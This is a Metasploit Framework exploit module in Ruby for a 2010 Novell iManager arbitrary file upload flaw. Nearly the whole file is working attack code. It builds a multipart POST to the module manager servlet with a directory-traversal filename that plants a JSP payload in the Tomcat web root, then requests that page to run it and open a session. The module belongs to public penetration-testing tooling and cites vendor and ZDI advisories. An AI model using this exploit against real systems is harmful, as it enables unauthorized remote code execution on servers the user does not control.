##
# $Id: novell_imanager_upload.rb 10758 2010-10-19 22:54:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Novell iManager getMultiPartParameters Arbitrary File Upload',
			'Description'    => %q{
					This module exploits a directory traversal vulnerability which
				allows remote attackers to upload and execute arbitrary code.

				PortalModuleInstallManager
			},
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10758 $',
			'Platform'       => [ 'win' ],
			'Privileged'     => true,
			'References'     =>
				[
					#[ 'CVE', '2010-??' ],
					[ 'OSVDB', '68320'],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-10-190/' ],
					[ 'URL', 'http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2' ],
				],
			'Targets'        =>
				[
					[ 'Universal Windows Target',
						{
							'Arch'     => ARCH_JAVA,
							'Payload'  =>
								{
									'DisableNops' => true,
								},
						}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 01 2010'
		))

		register_options(
			[
				Opt::RPORT(8080)
			], self.class )
	end

	def exploit

		page = Rex::Text.rand_text_alpha_upper(8) + ".jsp"

		fname = '../../../../../../../Progra~1/Novell/Tomcat/webapps/ROOT/'
		fname << page

		dbl = Rex::MIME::Message.new
		dbl.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"MODULE_FILE\"; filename=\"#{fname}\"")
		data = dbl.to_s
		# For some unknown reason, the service is unhappy with an extra EOL.
		data.strip!

		print_status("Uploading the payload via a POST request...")

		res = send_request_cgi(
			{
				'uri'     => '/nps/servlet/modulemanager',
				'version' => '1.1',
				'method'  => 'POST',
				'ctype'   => "multipart/form-data; boundary=#{dbl.bound}",
				'data'    => data,
			}, 5)

		if ( res and res.code == 200 and res.message =~ /OK/ )
			print_status("Sending our second request to '#{page}'...")
			data = send_request_raw({
					'uri'     => '/' + page,
					'method'  => 'GET',
					'version' => '1.0',
			}, 5)
			handler
		else
			raise RuntimeError, 'POST failed'
		end

	end
end
